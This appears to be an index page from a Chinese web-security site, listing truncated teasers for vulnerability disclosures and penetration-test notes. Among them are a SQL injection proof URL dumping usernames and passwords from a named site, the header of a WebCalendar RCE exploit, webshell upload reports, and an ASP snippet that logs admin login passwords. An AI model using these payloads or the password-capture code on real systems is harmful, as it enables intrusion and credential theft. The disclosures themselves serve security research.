Application Security Logging - 网站安全 - 自学php关注热度:10

How to Do Application Logging Rightis the best guidance I have come across to date. Co-written byAnton ChuvakinandGunnar Petersonfor the IEEE Security Privacy Journal, t.....[详情]

一次渗透测试笔记 - 网站安全 - 自学php关注热度:17

看到一个net站有一个上传但是看不到任何提示但是感觉上传成功且没重命名但是找不到上传地址。就随便翻下看到他们的下载中心 就放上去点了下 如图第一反应任意文件下载 然后下载..[详情]

17173SQL一个注入及修复 - 网站安全 - 自学php关注热度:18

http://tools.17173.com/tl/skill.php?id=402漏洞证明：http://tools.17173.com/tl/skill.php?id=402%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9,10,11,12,id,14,15,16,17,18,19%20from%2.....[详情]

PHP Ticket System Beta 1 (index.php p parameter) SQL注射 - 网关注热度:13

标题: PHP Ticket System Beta 1 #39;p#39; SQL Injection作者: G13 www.2cto.com下载地址: http://sourceforge.net/projects/phpticketsystem/影响版本: Beta 1问题描述PHP Ticket System is.....[详情]

WebCalendar <= 1.2.4 (install/index.php) 远程代码执行缺关注热度:20

?php/* ----------------------------------------------------------------------- WebCalendar = 1.2.4 (install/index.php) Remote Code Executionn Exploit ----------------------------------.....[详情]

浅谈web提权 - 网站安全 - 自学php关注热度:13

话说拿到一个shell之后想的就是提权，或者shell权限很大就不用了。看提权的方式无非就三种1、提权工具直接溢出，需要找可写目录2、数据库提权的sa 和root，orange的也可以 但是没接触过..[详情]

对某商城的一次入侵检测 - 网站安全 - 自学php关注热度:12

原先是 简单 看了看！。。。网站 程序是 asp.net web服务是 iis 6...如图 1休息一会 群里 吼 2句。。。扫描过程 很慢 于是 莪 等得不耐烦了！。。。拿起 啊D 去扫描。。。（PS:不行啊。。。..[详情]

汉庭连锁酒店后台过滤不严致SQL注入及修复 - 网关注热度:9

汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.详细说明：问题发生在这个站点.http://miaosha.htinns.com/标题内没有写具体信息.因为怕发布后被人入侵.后台登陆地址为:http://mia..[详情]

活熊取胆的归真堂官网上传漏洞可致获取webshel关注热度:11

之前看到其网站首页被改，自己也尝试了一下，发现此漏洞。上传页面http://www.gztxd.com//manage/Modle/UploadFile/ListFiles.aspxJAVA验证 加 一流拦截系统burp suite 改包上传获得webshell漏洞证明：htt..[详情]

ESHOP网商宝商城 1.0 GetWebshell - 网站安全 - 自学p关注热度:11

某天起床比较晚，起来发现地上有传单。看了下是个网店。于是想看看用的什么程序，找了下（看html注释,css注释，文件名）。发现是ESHOP网商宝商城。google下漏洞，发现有eshop的漏洞，..[详情]

杰奇CMS (<=1.7) SQL注入漏洞分析 - 网站安全 - 自关注热度:11

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS，目前的最新版本是1.7，在小说类的站中使用率还是比较高的，这几天花了点时间看了一下他的代码，觉得挺有意思的，跟大家分享一下。整..[详情]

asp截获后台登录密码 - 网站安全 - 自学php关注热度:20

通过修改后台登陆代码获得目标网站的用户登录密码。具体代码：set fso=server.createobject(scripting.filesystemobject)if fso.FileExists(server.mappath(log.txt))=true then set fin=fso.OpenTextF.....[详情]

5173逻辑错误致验证码可被绕过 - 网站安全 - 自学关注热度:38

5173某个应用的验证码竟然如此渣：http://promotion.5173.com/CodeAward/pages/vildcode.aspx直接：Set-Cookie: Code=YO6A; expires=Fri, 09-Mar-2012 09:20:51 GMT; path=/那你还放验证码干什么？就是为了.....[详情]

ShyPost企业管理系统后台无验证直接登录 - 网站安关注热度:15

直接登录网站后台管理，无需登录。详细说明：过访问http://www.2cto.com /admin/Session.asp可以直接登录网站后台漏洞证明：修复方案：删除admin/Session.asp文件可以解决..[详情]

Newscoop 3.5.3多个缺陷及修复 - 网站安全 - 自学ph关注热度:15

涉及产品: Newscoop作者 : Sourcefabric o.p.s.影响版本: 3.5.3 and probably prior, partially 4.0 RC3已测试版本: 3.5.3漏洞类型: Remote File Inclusion, SQL Injection, Cross-Site Scri.....[详情]